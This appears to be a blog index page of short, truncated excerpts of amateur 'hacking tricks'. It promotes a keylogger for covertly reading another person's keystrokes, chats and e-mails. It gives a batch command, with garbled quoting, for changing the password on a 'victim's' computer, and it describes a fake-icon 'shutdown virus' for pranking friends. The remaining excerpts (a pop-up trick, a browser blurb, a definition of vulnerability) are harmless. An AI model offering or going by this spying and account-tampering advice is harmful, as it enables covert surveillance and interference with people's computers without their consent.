All in one Keylogger

In these days,everyone uses computers. Computers have become something like a diary. Imagine that you would have the ability to read one?s diary without being exposed. Now you can! With All In One Keylogger you can monitor every activity on the computer including chat conversations,e-mails,keystrokes,desktop activities,and much more. Have you ever thought who is your […]

Change the password of a remote PC

Using the below given steps you can change the password of an user account in your victim’s computer. 1. Open notepad. 2. Type the following command. @echo off net user * ?’username’ ‘password’ echo ?type message here? pause 3. Save as filename.bat and select type of files as all files otherwise, file didn?t work. 4. […]

Google Chrome Beta

Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier. It is very light,efficient and easy to use with themes which you can add on to it. It takes less time to start when compared to browsers like Firefox,IE,Safari,etc. You can download it from: […]

How to make a Scary Pop-Up

You can use this trick to scare your friends or to make something useful, like reminders you put in Windows Start-up. Here are the steps on how to do a pop-up: 1. Open Notepad and type: text1=msgbox(“your text here”,52,”your title here”) Make A Scary Pop-up You can write as many text message boxes as you […]

How to make a Shutdown Virus

In this tutorial you will learn how to make a virus joke to your friends and shut down their computer. Replace one of their used icons on the desktop with a fake one. And when they try to open it, their computer will close. 1. Right click on the desktop and go to New\Create Shortcut. […]

Software Vulnerabilities of a Computer

The term ‘vulnerability’ is often mentioned in connection with computer security, in many different contexts. In its broadest sense, the term ‘vulnerability’ is associated with some violation of a security policy. This may be due to weak security rules, or it may be that there is a problem within the software itself. In theory, all […]